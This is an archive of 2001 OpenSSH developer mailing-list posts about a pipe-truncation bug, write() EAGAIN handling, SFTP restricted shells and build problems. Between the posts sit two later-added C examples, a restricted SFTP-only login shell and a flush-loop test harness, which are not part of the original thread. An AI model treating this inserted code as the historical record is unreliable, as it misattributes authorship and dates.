From: pspencer at fields.utoronto.ca (Philip Spencer) Date: Fri, 15 Jun 2001 18:22:27 -0400 (EDT) Subject: ssh & pipe In-Reply-To: <20010615221441.A23687@faui02.informatik.uni-erlangen.de> Message-ID: On Fri, 15 Jun 2001, Markus Friedl wrote: > do you have a ssh -v -v -v output for your test case? Yes; attached is the output from running ./ssh -1 -n -x -v -v -v fields 'yes |head -2000' | ( sleep 3 ; wc -l ) However, the additions you mentioned from the OpenBSD current CVS do fix the problem (without having to remove the set_nonblock lines); thanks! - Philip. --------------------------------- % ./ssh -1 -n -x -v -v -v fields 'yes |head -2000' | ( sleep 3 ; wc -l ) OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090581f debug1: Reading configuration data /home/pspencer/.ssh/config debug1: Reading configuration data /etc/ssh_config debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 483 geteuid 0 anon 1 debug1: Connecting to fields [128.100.216.11] port 22. debug1: temporarily_use_uid: 483/150 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 483/150 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/pspencer/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). 
debug3: check_host_in_hostfile: filename /home/pspencer/.ssh/known_hosts debug3: check_host_in_hostfile: filename /etc/ssh_known_hosts debug3: check_host_in_hostfile: match line 2 debug3: check_host_in_hostfile: filename /home/pspencer/.ssh/known_hosts debug3: check_host_in_hostfile: filename /etc/ssh_known_hosts debug3: check_host_in_hostfile: match line 2 debug1: Host 'fields' is known and matches the RSA1 host key. debug1: Found key in /etc/ssh_known_hosts:2 debug1: Encryption type: 3des debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying rhosts or /etc/hosts.equiv with RSA host authentication. debug1: Remote: Accepted for lpc13.fields.utoronto.ca [128.100.216.133] by /etc/hosts.equiv. debug1: Received RSA challenge for host key from server. debug1: Sending response to host key RSA challenge. debug1: Remote: Rhosts with RSA host authentication accepted. debug1: Rhosts or /etc/hosts.equiv with RSA host authentication accepted by server. debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: Sending command: yes |head -2000 debug1: Entering interactive session. debug1: fd 1 setting O_NONBLOCK debug1: Sending eof. Write failed flushing stdout buffer. debug1: Transferred: stdin 0, stdout 4096, stderr 0 bytes in 0.4 seconds debug1: Bytes per second: stdin 0.0, stdout 9599.6, stderr 0.0 debug1: Exit status 141 1024 % From dunlap at apl.washington.edu Sat Jun 16 09:40:32 2001 
From: dunlap at apl.washington.edu (John Dunlap) Date: Fri, 15 Jun 2001 16:40:32 -0700 (PDT) Subject: ssh & pipe In-Reply-To: from "Philip Spencer" at Jun 15, 2001 06:22:27 PM Message-ID: <200106152340.f5FNeWP03880@henry.apl.washington.edu> > > On Fri, 15 Jun 2001, Markus Friedl wrote: > > > do you have a ssh -v -v -v output for your test case? > > Yes; attached is the output from running > > ./ssh -1 -n -x -v -v -v fields 'yes | head -2000' | ( sleep 3 ; wc -l ) > > However, the additions you mentioned from the OpenBSD current CVS do fix > the problem (without having to remove the set_nonblock lines); thanks! > My experience had been only with protocol 2, which works fine in all the tests below. I see errors only using protocol 1 and then only when using head -20000. I am able to reliably see the failure using stock 2.9p1 when the client is slow (RHL6.2, P1/166), the server is fast (RHL7.1, P3/933) and the number of lines is greater than 2048. Using publickey auth with agent will fail when the client is fast and the server is slow but works using password auth. # this works with both password and publickey auth with agent slow $ ssh -1 -n -x fast 'yes | head -2000' | ( sleep 3 ; wc -l ) # this fails with both password auth and publickey with agent slow $ ssh -1 -n -x fast 'yes | head -20000' | ( sleep 3 ; wc -l ) # this works if using password auth but not if publickey with agent fast $ ssh -1 -n -x slow 'yes | head -20000' | ( sleep 3 ; wc -l ) The debugging outputs are below. henry is fast. fluke is slow. 
-- John --------------------- cut here ------------------------------------- henry # (ssh -1 -n -x -v -v -v fluke 'yes | head -20000' | ( sleep 3 ; wc -l ) ) 1>h1 2>&1 henry # cat h1 --------------------- cut here ------------------------------------- OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /usr/local/etc/ssh_config debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 0 geteuid 0 anon 1 debug1: Connecting to fluke [128.95.96.98] port 22. debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /root/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 1 debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 1 debug1: Host 'fluke' is known and matches the RSA1 host key. debug1: Found key in /root/.ssh/known_hosts:1 debug1: Encryption type: 3des debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying RSA authentication via agent with 'dunlap at henry.apl.washington.edu' debug1: Server refused our key. debug1: Trying RSA authentication via agent with 'root at henry.apl.washington.edu' debug1: Received RSA challenge from server. debug1: Sending response to RSA challenge. 
debug1: Remote: RSA authentication accepted. debug1: RSA authentication accepted by server. debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: Sending command: yes |head -20000 debug1: Entering interactive session. debug1: fd 1 setting O_NONBLOCK debug1: fd 2 setting O_NONBLOCK debug1: Sending eof. Write failed flushing stdout buffer. debug1: Transferred: stdin 0, stdout 4096, stderr 0 bytes in 0.2 seconds debug1: Bytes per second: stdin 0.0, stdout 21395.0, stderr 0.0 debug1: Exit status 0 2048 --------------------- cut here ------------------------------------- fluke # ( ssh -1 -n -x -v -v -v henry 'yes | head -20000' | ( sleep 3 ; wc -l ) ) > f1 2>&1 fluke # cat f1 OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090581f debug1: Reading configuration data /usr/local/etc/ssh_config debug1: Applying options for henry debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 0 geteuid 0 anon 1 debug1: Connecting to henry [128.95.96.159] port 22. debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /root/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 5 debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 5 debug1: Host 'henry' is known and matches the RSA1 host key. 
debug1: Found key in /root/.ssh/known_hosts:5 debug1: Encryption type: 3des debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying RSA authentication via agent with 'root at fluke.apl.washington.edu' debug1: Received RSA challenge from server. debug1: Sending response to RSA challenge. debug1: Remote: RSA authentication accepted. debug1: RSA authentication accepted by server. debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: Requesting authentication agent forwarding. debug1: Sending command: yes | head -20000 debug1: Entering interactive session. debug1: fd 1 setting O_NONBLOCK debug1: fd 2 setting O_NONBLOCK debug1: Sending eof. Write failed flushing stdout buffer. debug1: Transferred: stdin 0, stdout 4096, stderr 0 bytes in 0.1 seconds debug1: Bytes per second: stdin 0.0, stdout 46880.0, stderr 0.0 debug1: Exit status 0 2048 --------------------- cut here ------------------------------------- From mouring at etoh.eviladmin.org Sat Jun 16 09:35:30 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 15 Jun 2001 18:35:30 -0500 (CDT) Subject: EOL problem with channels.h in CVS In-Reply-To: <480995445.992618440@ZATHROS> Message-ID: I don't see this in the OpenBSD nor Portable tree. - Ben On Fri, 15 Jun 2001, Carson Gaspar wrote: > channels.h from today's CVS has MS-DOS ^M end-of-line chars. > > -- > Carson Gaspar - carson at taltos.org > Queen trapped in a butch body > From markus.friedl at informatik.uni-erlangen.de Sat Jun 16 18:36:02 2001 
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 16 Jun 2001 10:36:02 +0200 Subject: Patch for stdout/stderr buffer flush write() handling In-Reply-To: <480910633.992618356@ZATHROS>; from carson@taltos.org on Fri, Jun 15, 2001 at 03:19:16PM -0700 References: <480910633.992618356@ZATHROS> Message-ID: <20010616103602.B2139@folly> On Fri, Jun 15, 2001 at 03:19:16PM -0700, Carson Gaspar wrote: > The attached patch against today's CVS improves write() error handling and > logging in clientloop.c when flushing stdout/stderr. you can get EAGAIN if the fd is blocking? -------------- next part -------------- A non-text attachment was scrubbed... Name: clientloop.c.diff Type: application/octet-stream Size: 966 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010616/6fc00f17/attachment.obj From markus.friedl at informatik.uni-erlangen.de Sat Jun 16 18:46:36 2001 
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 16 Jun 2001 10:46:36 +0200 Subject: SFTP Logging In-Reply-To: <20010615103749.A25892@dour.org>; from jason@dour.org on Fri, Jun 15, 2001 at 10:37:49AM -0400 References: <3B29568A.9E2BC874@bartlett.house> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010614202029.B1274@zax.half.pint-stowp.cx> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010615103749.A25892@dour.org> Message-ID: <20010616104636.B14300@folly> On Fri, Jun 15, 2001 at 10:37:49AM -0400, Jason A . Dour wrote: > On Fri, Jun 15, 2001 at 10:27:54AM +1000, Andrew Bartlett wrote: > > Remember that it will amount to moot unless you use a restricted > > shell, like the one I have posted to this list earlier, as > > otherwise users can just use their own SFTP server - without your > > logging capabilities. > > True. But I'm also coding such a shell to meet my needs for > SFTP/SCP restricted users only. And I'm also spelunking the OpenSSH > codebase to see about separating authentication and authorization. > > I don't know if authent/authoriz separation has been discussed > before, but regardless of the authentication method I've allowed, I > need to restrict what a user can do. I haven't come up with a clear > solution yet, but I've a few ideas forming... is authorization openssh's job? i'm not sure. you could move all the authorization logic into a different layer, e.g. a special login shell. From jason at dour.org Sun Jun 17 01:29:48 2001 
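The "special login shell" Markus suggests, and the SFTP-only restricted shell Andrew and Jason mention, are simple to build: sshd runs a subsystem through the account's login shell as `shell -c <command>`, so a shell that accepts exactly that argument vector for the configured sftp-server path, and nothing else, confines the account to SFTP. The following is an added example, not code from this thread or from OpenSSH; the path /usr/local/libexec/sftp-server and the program name sftpsh are assumptions, and the path must match the Subsystem line in sshd_config.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* The one program this shell will ever run.  Assumed path: it must be the
 * same string as the "Subsystem sftp ..." line in sshd_config on this host. */
#define SFTP_SERVER "/usr/local/libexec/sftp-server"

/* sshd starts a subsystem through the account's login shell as
 *     <shell> -c <subsystem command>
 * Accept exactly that argument vector: not an interactive login (argc == 1),
 * not any other -c command, not the right command with extra arguments.
 * Exact string compare and no shell parsing, so "path; sh" is refused. */
int sftp_only_allowed(int argc, char *const argv[])
{
    if (argc != 3 || strcmp(argv[1], "-c") != 0)
        return 0;
    return strcmp(argv[2], SFTP_SERVER) == 0;
}

/* Would this shell accept "-c <cmd>"?  (wrapper for testing the policy) */
int sftp_only_accepts_command(const char *cmd)
{
    char *const argv[] = { "sftpsh", "-c", (char *)cmd, NULL };
    return sftp_only_allowed(3, argv);
}

int main(int argc, char *argv[])
{
    if (!sftp_only_allowed(argc, argv)) {
        fprintf(stderr, "sftpsh: this account is restricted to SFTP\n");
        return 1;
    }
    /* Exec the fixed path, never argv[2], so the check and the exec can
     * never disagree; the argv we pass is what sftp-server sees. */
    char *const args[] = { SFTP_SERVER, NULL };
    execv(SFTP_SERVER, args);
    perror("sftpsh: execv");
    return 1;
}
```

Install the binary as the account's login shell (and list it in /etc/shells if anything on the host checks that file). This only covers the shell hand-off: TCP and X11 forwarding requests never pass through the shell, so the per-key `no-port-forwarding`, `no-X11-forwarding`, `no-agent-forwarding` and `no-pty` options in authorized_keys are still needed for accounts that must not get them.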
From: jason at dour.org (Jason A . Dour) Date: Sat, 16 Jun 2001 11:29:48 -0400 Subject: SFTP Logging In-Reply-To: <20010616104636.B14300@folly>; from markus.friedl@informatik.uni-erlangen.de on Sat, Jun 16, 2001 at 10:46:36AM +0200 References: <3B29568A.9E2BC874@bartlett.house> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010614202029.B1274@zax.half.pint-stowp.cx> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010615103749.A25892@dour.org> <20010616104636.B14300@folly> Message-ID: <20010616112948.A26580@dour.org> On Sat, Jun 16, 2001 at 10:46:36AM +0200, Markus Friedl wrote: > On Fri, Jun 15, 2001 at 10:37:49AM -0400, Jason A . Dour wrote: > > I don't know if authent/authoriz separation has been discussed > > before, but regardless of the authentication method I've allowed, I > > need to restrict what a user can do. I haven't come up with a clear > > solution yet, but I've a few ideas forming... > > is authorization openssh's job? Not necessarily. But it presently is partly its job by the fact that certain levels of authorization can take place when you use key-based authentication. Being able to limit what commands are allowed, instituting override commands, and the like that are possible with key-based auth, I would like to do with any authentication specified as valid. > i'm not sure. you could move all the authorization logic > into a different layer, e.g. a special login shell. True. I had actually given this some thought, but I didn't want to duplicate the work done with key-based authorization. So I was wondering if it made more sense to include it into that code and then make openssh's authorization work for all authentications. I already have a basic SFTP only restricted shell, and it works quite nicely. It would be nice to have it scan a config file for its information for some finer-grained control, but before I started down that path I wanted to evaluate putting such code into the server proper. 
Has any of this been discussed before? Am I covering old ground? If so, I'd love to see the archives of the previous discussions in case there are some pitfalls that have been discussed. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From carson at taltos.org Sun Jun 17 06:57:31 2001 From: carson at taltos.org (Carson Gaspar) Date: Sat, 16 Jun 2001 13:57:31 -0700 Subject: Patch for stdout/stderr buffer flush write() handling In-Reply-To: <20010616103602.B2139@folly> References: <20010616103602.B2139@folly> Message-ID: <218401578.992699851@athyra> --On Saturday, June 16, 2001 10:36 AM +0200 Markus Friedl wrote: > On Fri, Jun 15, 2001 at 03:19:16PM -0700, Carson Gaspar wrote: >> The attached patch against today's CVS improves write() error handling >> and logging in clientloop.c when flushing stdout/stderr. > > you can get EAGAIN if the fd is blocking? Not on any UNIX I know of, but that's not the point. EAGAIN is a non-fatal error, and we've just encountered a situation where another part of the code made the fd non-blocking. The old code couldn't handle this, and died. After the patch, it will do the right thing no matter what. This makes the code more resilient to bizarre OS behaviour, and to intentional or unintentional code changes. -- Carson From markus.friedl at informatik.uni-erlangen.de Sun Jun 17 19:01:38 2001 
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sun, 17 Jun 2001 11:01:38 +0200 Subject: Patch for stdout/stderr buffer flush write() handling In-Reply-To: <218401578.992699851@athyra>; from carson@taltos.org on Sat, Jun 16, 2001 at 01:57:31PM -0700 References: <20010616103602.B2139@folly> <218401578.992699851@athyra> Message-ID: <20010617110138.A19661@folly> On Sat, Jun 16, 2001 at 01:57:31PM -0700, Carson Gaspar wrote: > > > --On Saturday, June 16, 2001 10:36 AM +0200 Markus Friedl > wrote: > > > On Fri, Jun 15, 2001 at 03:19:16PM -0700, Carson Gaspar wrote: > >> The attached patch against today's CVS improves write() error handling > >> and logging in clientloop.c when flushing stdout/stderr. > > > > you can get EAGAIN if the fd is blocking? > > Not on any UNIX I know of, but that's not the point. EAGAIN is a non-fatal > error, and we've just encountered a situation where another part of the > code made the fd non-blocking. The old code couldn't handle this, and died. but this was the right thing to do. otherwise we had a busy loop. so it lead to the discovery of an actual bug. > After the patch, it will do the right thing no matter what. This makes the > code more resilient to bizarre OS behaviour, and to intentional or > unintentional code changes. From don-temp52998413 at isis.compsvcs.com Sun Jun 17 15:54:34 2001 
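The exchange above comes down to two ways of not losing data when the final stdout flush hits a descriptor that is still in O_NONBLOCK mode: tolerate EAGAIN in the flush loop without spinning (Carson's patch), or put the descriptor back into blocking mode before flushing (what -current did). The following is an added example written for this thread, not OpenSSH code and not anyone's posted patch. It reproduces the `'yes | head -N' | ( sleep 3 ; wc -l )` shape offline: a forked reader that waits before draining a pipe stands in for the slow consumer, the 4 MiB of 'y' bytes are constructed input, and the 200 ms delay stands in for `sleep 3`. Both the naive flush loop the report describes and the two fixes are shown; the harness returns the byte count the reader actually received.

```c
#define _GNU_SOURCE             /* POSIX prototypes even under strict -std= modes */
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Flush loop of the shape the thread describes: any write() result <= 0 is
 * fatal, so on a fd left in O_NONBLOCK mode it gives up at the first EAGAIN. */
int flush_naive(int fd, const char *buf, size_t len)
{
    size_t off = 0;
    while (off < len) {
        ssize_t n = write(fd, buf + off, len - off);
        if (n <= 0)
            return -1;
        off += (size_t)n;
    }
    return 0;
}

/* Flush loop that tolerates short writes, EINTR and EAGAIN/EWOULDBLOCK.
 * On EAGAIN it waits in poll() until the fd is writable instead of
 * retrying immediately, so tolerating the error does not become a busy loop. */
int flush_resilient(int fd, const char *buf, size_t len)
{
    size_t off = 0;
    while (off < len) {
        ssize_t n = write(fd, buf + off, len - off);
        if (n > 0) {
            off += (size_t)n;
            continue;
        }
        if (n == 0) { errno = EIO; return -1; }   /* not expected for a pipe; do not spin */
        if (errno == EINTR)
            continue;
        if (errno == EAGAIN || errno == EWOULDBLOCK) {
            struct pollfd pfd = { .fd = fd, .events = POLLOUT, .revents = 0 };
            if (poll(&pfd, 1, -1) < 0 && errno != EINTR)
                return -1;
            continue;
        }
        return -1;
    }
    return 0;
}

/* The fix -current took instead: put the fd back into blocking mode first. */
int unset_nonblock(int fd)
{
    int fl = fcntl(fd, F_GETFL);
    return fl < 0 ? -1 : fcntl(fd, F_SETFL, fl & ~O_NONBLOCK);
}

/* Stand-in for  ssh host 'yes | head -N' | ( sleep 3 ; wc -c ):  a forked
 * reader waits 200 ms before draining the pipe, the write end is put into
 * O_NONBLOCK mode as clientloop.c did, and `flush` pushes `total` constructed
 * bytes through.  Returns the byte count the reader saw, -1 if flush failed. */
long run_slow_pipe(int (*flush)(int, const char *, size_t), size_t total,
                   int restore_blocking)
{
    int data[2], back[2];
    long got = -1;
    char *buf = malloc(total);
    if (buf == NULL || pipe(data) < 0 || pipe(back) < 0)
        return -1;
    memset(buf, 'y', total);
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                         /* reader side */
        char tmp[4096];
        long seen = 0;
        ssize_t n;
        close(data[1]);
        close(back[0]);
        poll(NULL, 0, 200);                 /* the "sleep 3" */
        while ((n = read(data[0], tmp, sizeof tmp)) > 0)
            seen += n;
        _exit(write(back[1], &seen, sizeof seen) == (ssize_t)sizeof seen ? 0 : 1);
    }
    close(data[0]);
    close(back[1]);
    fcntl(data[1], F_SETFL, fcntl(data[1], F_GETFL) | O_NONBLOCK);
    if (restore_blocking)
        unset_nonblock(data[1]);
    int rc = flush(data[1], buf, total);
    free(buf);
    close(data[1]);                         /* reader sees EOF and reports */
    if (read(back[0], &got, sizeof got) != (ssize_t)sizeof got)
        got = -1;
    close(back[0]);
    waitpid(pid, NULL, 0);
    return rc < 0 ? -1 : got;
}
```

With the naive loop on the non-blocking pipe the run fails as soon as the kernel pipe buffer fills, which is the truncated `wc -l` count in the reports above; either fix delivers everything. Markus's objection still stands in one respect: if the descriptor is non-blocking by mistake, the poll() version hides that mistake, so the explicit unset_nonblock() before the flush is the clearer fix for the client, and the EAGAIN handling is the defence in depth.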
From: don-temp52998413 at isis.compsvcs.com (Don Cohen) Date: Sat, 16 Jun 2001 22:54:34 -0700 (PDT) Subject: getnameinfo failed Message-ID: <200106170554.f5H5sY708379@isis.compsvcs.com> I'm running openssh-2.3.0p1 in linux. scp -P 2222 -v user at 207.224.119.73:openssh-2.3.0p1.tar /tmp/junk gives me Executing: program /usr/local/bin/ssh host 207.224.119.73, user user, command scp -v -f openssh-2.3.0p1.tar ssh_connect: getnameinfo failed I get that 3 times and then it gives up. I've changed ssh_connect as follows: if (getnameinfo(ai->ai_addr,ai->ai_addrlen, ntop, sizeof(ntop), strport,sizeof(strport), NI_NUMERICHOST|NI_NUMERICSERV) != 0) { error("ssh_connect: getnameinfo failed"); *** commented out next line continue; and now after the getnameinfo failed message it continues ... The authenticity of host '207.224.119.73' can't be established. and then everything works. I'm trying to understand what that getnameinfo is meant to accomplish. Is there any problem with removing it? Does it have anything to do with this authenticity check and how is authenticity supposed to be established? Thanks. From ecashin at terry.uga.edu Mon Jun 18 02:03:31 2001 From: ecashin at terry.uga.edu (Ed L Cashin) Date: 17 Jun 2001 12:03:31 -0400 Subject: no // comments, please In-Reply-To: <15146.33528.118362.897059@darkwing.uoregon.edu> References: <15146.33528.118362.897059@darkwing.uoregon.edu> Message-ID: Steve VanDevender writes: > Non-gcc compilers tend not to like C++-style // comments in plain C > code, as I discovered when trying to build the latest snapshot > (20010615) with the Tru64 UNIX C compiler. It doesn't matter (practically speaking), since some compilers haven't caught up, and folks also use old ones anyway, but those "//" comments *are* part of the C programming language as defined by the C99 ISO standard. -- --Ed Cashin PGP public key: ecashin at terry.uga.edu http://www.terry.uga.edu/~ecashin/pgp/ From mouring at etoh.eviladmin.org Mon Jun 18 03:50:53 2001 
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sun, 17 Jun 2001 12:50:53 -0500 (CDT) Subject: no // comments, please In-Reply-To: Message-ID: It's still best to avoid using them, mainly for the fact that it's not accepted as part of the OpenBSD coding style. Besides, it has already been taken care of in the -CURRENT branch. Come to think of it, I'm unsure if it was dealt with in branch 2.9. - Ben On 17 Jun 2001, Ed L Cashin wrote: > Steve VanDevender writes: > > > Non-gcc compilers tend not to like C++-style // comments in plain C > > code, as I discovered when trying to build the latest snapshot > > (20010615) with the Tru64 UNIX C compiler. > > It doesn't matter (practically speaking), since some compilers haven't > caught up, and folks also use old ones anyway, but those "//" comments > *are* part of the C programming language as defined by the C99 ISO > standard. > > -- > --Ed Cashin PGP public key: > ecashin at terry.uga.edu http://www.terry.uga.edu/~ecashin/pgp/ > > From djm at mindrot.org Mon Jun 18 17:01:15 2001 From: djm at mindrot.org (Damien Miller) Date: Mon, 18 Jun 2001 17:01:15 +1000 (EST) Subject: Portable OpenSSH 2.9p2 Message-ID: Portable OpenSSH 2.9p2 has just been uploaded and shall be making its way to the mirrors listed at http://www.openssh.com/portable.html shortly. This release fixes the "cookies" file deletion problem reported on BUGTRAQ as well as a few other minor (non-security) bugs. No new features have been added in this release. Regards, Damien Miller -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From simon at sxw.org.uk Mon Jun 18 21:14:46 2001 
From: simon at sxw.org.uk (Simon Wilkinson)
Date: Mon, 18 Jun 2001 12:14:46 +0100
Subject: GSSAPI patch for OpenSSH 2.9p2
In-Reply-To:
References:
Message-ID: <01061812144602.05052@loki.dcs.ed.ac.uk>

A new version of the GSSAPI patch is available from http://www.sxw.org.uk/computing/patches/openssh.html

This has been updated for 2.9p2. It includes a number of minor bug fixes, and adds support for removing credentials caches upon connection completion.

Thanks once again to Chris Chiappa, Nalin Dahyabhai, Bill Fithen, Karsten Huneycutt, John Kilburg, Daniel Kouril, Dan Russell and Von Welch for their contributions.

--
Simon Wilkinson
http://www.sxw.org.uk

From alexander.kurz at qsc.de Tue Jun 19 00:39:06 2001
From: alexander.kurz at qsc.de (Alexander Kurz)
Date: Mon, 18 Jun 2001 16:39:06 +0200
Subject: make scp more script-capable
Message-ID: <3B2E128A.3B7C6192@qsc.de>

Hi,

here's a proposal of a new ssh/scp-feature:

-------------------------------------------------------
please implement a timeout with non-zero error-returncode on
"Are you sure you want to continue connecting (yes/no)?"
-------------------------------------------------------

My situation:
recently I have implemented a cronjob that is using scp.
Due to organizational reasons, the hostname of the remote machine changed.
The problem that came up at this point is that this message came up:

akurz at dev157-34:~ > ssh someuser at somehost.mydomanin.de
The authenticity of host 'someuser at somehost.mydomanin.de' can't be established.
RSA key fingerprint is 00:12:4a:fc:33:80:71:70:4b:bb:e4:9d:16:c7:30:62.
Are you sure you want to continue connecting (yes/no)?

BUT: I did not see the message, because I have discarded it via

scp someuser at somehost.mydomanin.de:~/somefiles* . >/dev/null

So the script hung without complaining.
If there was some timeout-functionality, I could easily check scp's returncode and create a nice error-message.

regards,
Alexander Kurz, akur at qsc.de

From dwd at bell-labs.com Tue Jun 19 02:16:51 2001
From: dwd at bell-labs.com (Dave Dykstra)
Date: Mon, 18 Jun 2001 11:16:51 -0500
Subject: Default Path in sshd_config
In-Reply-To: <3B2A8A13.67050307@globalstar.com>; from crist.clark@globalstar.com on Fri, Jun 15, 2001 at 03:20:03PM -0700
References: <3B2A8A13.67050307@globalstar.com>
Message-ID: <20010618111651.A11573@lucent.com>

On Fri, Jun 15, 2001 at 03:20:03PM -0700, Crist Clark wrote:
> I was just building binary Solaris packages of OpenSSH for use at
> our company. While doing so, it occurred to me that the only thing
> that really stops me from being able to make a binary build totally
> relocatable in the filesystem tree is the default path. Other than
> that, I cannot think of any file path that cannot be modified with
> either a command line option or in a configuration file.
>
> Is there a reason that, for example,
>
> DefaultPath /opt/openssh/bin
>
> Could not be something put into the sshd_config file? Or does this
> exist in the code, but not (or I missed it) in the documentation?
>
> (Oh, and I still need to hack around with the manpages by hand to
> get them to work in Solaris, but I think that is a known issue?)
> --
> Crist J. Clark Network Security Engineer
> crist.clark at globalstar.com Globalstar, L.P.
> (408) 933-4387 FAX: (408) 933-4926

There are more compiled-in defaults than that; if you do a 'strings' on all the binaries you'll see them. There's at least the 'primes' file, and if you use the built-in prng there's also the 'ssh_prng_cmds' file. I use my general-purpose binary relocater, available at http://www.bell-labs.com/project/nsbd/breloc.html

- Dave Dykstra

From reillye at yahoo.com Tue Jun 19 02:50:44 2001
From: reillye at yahoo.com (Eileen Reilly-Horch)
Date: Mon, 18 Jun 2001 09:50:44 -0700 (PDT)
Subject: Building on Solaris 8 - RAND_add (etc) errors
Message-ID: <20010618165044.65456.qmail@web13302.mail.yahoo.com>

I was running into the problem building OpenSSH on Solaris that many others reported - configure failed stating:

configure:4354: checking for OpenSSL directory
configure:4411: cc -o conftest -g -I/usr/local/include -I/usr/include -I/usr/local/ssl/include -L/usr/local/lib -L/usr/local/ssl/lib -R/usr/local/lib -R/usr/local/ssl/lib conftest.c -lz -lsocket -lnsl -lgen -lcrypto 1>&5
Undefined                       first referenced
 symbol                             in file
RAND_add                            conftest.o
RAND_status                         conftest.o
ld: fatal: Symbol referencing errors. No output written to conftest
configure: failed program was:
#line 4397 "configure"
#include "confdefs.h"

The solution to this problem that I found is to build OpenSSL with 32 bit support only (i.e, do ./config - do NOT do ./Configure solaris64-sparcv9-cc), then configure OpenSSH.

I hope this helps!

Eileen Reilly-Horch

__________________________________________________
Do You Yahoo!?
Spot the hottest trends in music, movies, and more.
http://buzz.yahoo.com/

From misawa at bnl.gov Tue Jun 19 03:26:08 2001
From: misawa at bnl.gov (Shigeki Misawa)
Date: Mon, 18 Jun 2001 13:26:08 -0400 (EDT)
Subject: openssh-2.9p2 with PAM and Kerberos 5 on Solaris 8
Message-ID: <15150.14768.619459.432326@gargle.gargle.HOWL>

Hi.

Has anyone been able to get Openssh-2.9p2 or p1 or Openssh-2.5.2p2 to work with the Kerberos 5 PAM on Solaris 8 ? More specifically, I am trying to get the system to work with Kerberos 5 only (no pam_unix). My attempts to get things running result in the following messages from ssh (client side):

> user at ssh-gateway's password:
> client: Requesting pty.
> client: Requesting X11 forwarding with authentication spoofing.
> client: Requesting shell.
> client: Entering interactive session.
> Last login: Mon Jun 18 13:01:05 2001 from client.domain
> debug1: PAM establishing creds
> Command terminated on signal 10.

On the server side I get:

> debug1: PAM setting tty to "/dev/pts/4"
> debug1: PAM establishing creds
> debug1: Entering interactive session.
> debug1: fd 9 setting O_NONBLOCK
> debug1: fd 10 IS O_NONBLOCK
> debug1: server_init_dispatch_13
> debug1: server_init_dispatch_15
> debug1: Received SIGCHLD.
> debug1: End of interactive session; stdin 0, stdout (read 93, sent 93), stderr 0 bytes.
>

I am running with a /etc/pam.conf file as follows:

other auth required /usr/lib/security/$ISA/pam_krb5.so.1
other account required /usr/lib/security/$ISA/pam_krb5.so.1
other session required /usr/lib/security/$ISA/pam_krb5.so.1
other password required /usr/lib/security/$ISA/pam_krb5.so.1 try_first_pass

